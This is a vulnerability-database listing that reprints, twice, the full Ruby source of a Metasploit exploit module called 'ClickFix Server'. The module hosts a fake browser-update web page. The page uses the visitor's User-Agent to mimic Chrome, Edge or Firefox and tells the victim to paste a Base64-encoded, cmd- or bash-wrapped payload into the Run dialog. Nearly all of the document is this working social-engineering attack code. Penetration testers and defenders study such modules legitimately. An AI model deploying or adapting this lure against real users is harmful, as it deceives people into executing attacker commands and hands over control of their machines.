ClickFix Server_MSF:EXPLOIT-MULTI-MISC-CLICKFIX_SERVER-

Description

This creates a Web Server which hosts a ClickFix type exploit. When a user visits the site they are given instructions on pasting our payload into a run dialog. When using a custom html page, please use INSERTPAYLOADHERE as the spot to put the...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-MULTI-MISC-CLICKFIX_SERVER-

Published Jun 5, 2026 at 18:55

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'base64'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer

def initialize(info = {})
super(
update_info(
info,
'Name' => 'ClickFix Server',
'Description' => %q{
This creates a Web Server which hosts a ClickFix type exploit.
When a user visits the site they are given instructions on pasting
our payload into a run dialog.

When using a custom html page, please use INSERT_PAYLOAD_HERE as the
spot to put the generated payload in.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'boredchilada' # clickfix template inspiration
],
'References' => [
['URL', 'https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf'],
['URL', 'https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/'],
['URL', 'https://github.com/boredchilada/clickfix-simulator-2025'],
['URL', 'https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos']
],
'Payload' => {
'Space' => 245, # Reserve room for wrapper so final command fits Run dialog max
'DisableNops' => true
},
'Arch' => [ARCH_CMD],
'Stance' => Msf::Exploit::Stance::Passive,
'Passive' => true,
'Targets' => [
['Windows', { 'Platform' => 'win' }],
['Linux', { 'Platform' => ['linux', 'unix'] }]
],
'DisclosureDate' => '2023-01-01',
'DefaultTarget' => 0,
'Notes' => {
'AKA' => ['ClickFix', 'ClearFake', 'Fake Update', 'CrashFix'],
'Stability' => [CRASH_SAFE],
'SideEffects' => [],
'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT]
}
)
)
# set the default port, and a URI that a user can set if the app isn't installed to the root
register_options(
[
OptPort.new('SRVPORT', [true, 'Web Server Port', 80]),
OptEnum.new('TEMPLATE', [ true, 'Template style to use', 'auto', %w[auto custom]]),
OptPath.new('CUSTOM', [false, 'Custom Template Path', ''], conditions: ['TEMPLATE', '==', 'custom'])
]
)
end

def on_request_uri(cli, request)
if request.method == 'GET'
user_agent = request['User-Agent']
print_status("Request #{request.uri} from #{user_agent}")
# get our payload stubbed
if target.name == 'Windows'
p_load = payload.encoded.gsub(' start /B', '') # 'start /B' only works on cmd, not in the run dialog box
p_load = "cmd /c \"#{p_load}\"" # run command dialog can't use & so we wrap in cmd
else
# Linux Application Finder can't have ; so wrap it in bash
p_load = "bash -c \"#{payload.encoded}\""
end
case datastore['TEMPLATE']
when 'custom'
template = ::File.read(::File.read(datastore['CUSTOM'], mode: 'rb'))
template.gsub!('INSERT_PAYLOAD_HERE', Base64.strict_encode64(p_load))
send_response(cli, ::File.read(datastore['CUSTOM'], mode: 'rb'))
else
template = ::File.read(File.join(Msf::Config.data_directory, 'exploits', 'clickfix', 'browser_update.html'))
template.gsub!('INSERT_PAYLOAD_HERE', Base64.strict_encode64(p_load))
if user_agent =~ %r{Edg/}
version = user_agent.match(%r{Edg/([\d.]+)})
template.gsub!('120.0.6099.0', version[1]) if version
template.gsub!('Google Chrome', 'Microsoft Edge')
template.gsub!('Chrome', 'Edge') if version
elsif user_agent =~ /Chrome/
version = user_agent.match(%r{Chrome/([\d.]+)})
template.gsub!('120.0.6099.0', version[1]) if version
elsif user_agent =~ /Firefox/
version = user_agent.match(%r{Firefox/([\d.]+)})
template.gsub!('120.0.6099.0', version[1]) if version
template.gsub!('Google Chrome', 'Mozilla Firefox')
template.gsub!('Chrome', 'Firefox') if version
else
# assume chrome based on marketshare
fake_version = "#{rand(201..400)}.0.#{rand(1000..9999)}.0"
template.gsub!('120.0.6099.0', fake_version)
end
send_response(cli, template)
end
end
end

def run
if datastore['TEMPLATE'] == 'custom' && File.exist?(datastore['CUSTOM'])
fail_with(Failure::BadConfig, "Custom template path not found: #{datastore['CUSTOM']}")
end
exploit # start http server
end
end

{
    "lastseen": "2026-06-05T19:28:02",
    "description": "This creates a Web Server which hosts a ClickFix type exploit. When a user visits the site they are given instructions on pasting our payload into a run dialog. When using a custom html page, please use INSERTPAYLOADHERE as the spot to put the...",
    "published": "2026-06-05T18:55:22",
    "modified": "2026-06-05T18:55:22",
    "type": "metasploit",
    "title": "ClickFix Server",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-MULTI-MISC-CLICKFIX_SERVER-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'base64'\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpServer\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'ClickFix Server',\n        'Description' => %q{\n          This creates a Web Server which hosts a ClickFix type exploit.\n          When a user visits the site they are given instructions on pasting\n          our payload into a run dialog.\n\n          When using a custom html page, please use INSERT_PAYLOAD_HERE as the\n          spot to put the generated payload in.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'h00die', # msf module\n          'boredchilada' # clickfix template inspiration\n        ],\n        'References' => [\n          ['URL', 'https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf'],\n          ['URL', 'https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/'],\n          ['URL', 'https://github.com/boredchilada/clickfix-simulator-2025'],\n          ['URL', 'https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos']\n        ],\n        'Payload' => {\n          'Space' => 245, # Reserve room for wrapper so final command fits Run dialog max\n          'DisableNops' => true\n        },\n        'Arch' => [ARCH_CMD],\n        'Stance' => Msf::Exploit::Stance::Passive,\n        'Passive' => true,\n        'Targets' => [\n          ['Windows', { 'Platform' => 'win' }],\n          ['Linux', { 'Platform' => ['linux', 'unix'] }]\n        ],\n        'DisclosureDate' => '2023-01-01',\n        'DefaultTarget' => 0,\n        'Notes' => {\n          'AKA' => ['ClickFix', 'ClearFake', 'Fake Update', 'CrashFix'],\n          'Stability' => [CRASH_SAFE],\n          'SideEffects' => [],\n          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT]\n        }\n      )\n    )\n    # set the default port, and a URI that a user can set if the app isn't installed to the root\n    register_options(\n      [\n        OptPort.new('SRVPORT', [true, 'Web Server Port', 80]),\n        OptEnum.new('TEMPLATE', [ true, 'Template style to use', 'auto', %w[auto custom]]),\n        OptPath.new('CUSTOM', [false, 'Custom Template Path', ''], conditions: ['TEMPLATE', '==', 'custom'])\n      ]\n    )\n  end\n\n  def on_request_uri(cli, request)\n    if request.method == 'GET'\n      user_agent = request['User-Agent']\n      print_status(\"Request #{request.uri} from #{user_agent}\")\n      # get our payload stubbed\n      if target.name == 'Windows'\n        p_load = payload.encoded.gsub(' start /B', '') # 'start /B' only works on cmd, not in the run dialog box\n        p_load = \"cmd /c \\\"#{p_load}\\\"\" # run command dialog can't use & so we wrap in cmd\n      else\n        # Linux Application Finder can't have ; so wrap it in bash\n        p_load = \"bash -c \\\"#{payload.encoded}\\\"\"\n      end\n      case datastore['TEMPLATE']\n      when 'custom'\n        template = ::File.read(::File.read(datastore['CUSTOM'], mode: 'rb'))\n        template.gsub!('INSERT_PAYLOAD_HERE', Base64.strict_encode64(p_load))\n        send_response(cli, ::File.read(datastore['CUSTOM'], mode: 'rb'))\n      else\n        template = ::File.read(File.join(Msf::Config.data_directory, 'exploits', 'clickfix', 'browser_update.html'))\n        template.gsub!('INSERT_PAYLOAD_HERE', Base64.strict_encode64(p_load))\n        if user_agent =~ %r{Edg/}\n          version = user_agent.match(%r{Edg/([\\d.]+)})\n          template.gsub!('120.0.6099.0', version[1]) if version\n          template.gsub!('Google Chrome', 'Microsoft Edge')\n          template.gsub!('Chrome', 'Edge') if version\n        elsif user_agent =~ /Chrome/\n          version = user_agent.match(%r{Chrome/([\\d.]+)})\n          template.gsub!('120.0.6099.0', version[1]) if version\n        elsif user_agent =~ /Firefox/\n          version = user_agent.match(%r{Firefox/([\\d.]+)})\n          template.gsub!('120.0.6099.0', version[1]) if version\n          template.gsub!('Google Chrome', 'Mozilla Firefox')\n          template.gsub!('Chrome', 'Firefox') if version\n        else\n          # assume chrome based on marketshare\n          fake_version = \"#{rand(201..400)}.0.#{rand(1000..9999)}.0\"\n          template.gsub!('120.0.6099.0', fake_version)\n        end\n        send_response(cli, template)\n      end\n    end\n  end\n\n  def run\n    if datastore['TEMPLATE'] == 'custom' && File.exist?(datastore['CUSTOM'])\n      fail_with(Failure::BadConfig, \"Custom template path not found: #{datastore['CUSTOM']}\")\n    end\n    exploit # start http server\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/clickfix_server.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/multi/misc/clickfix_server/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply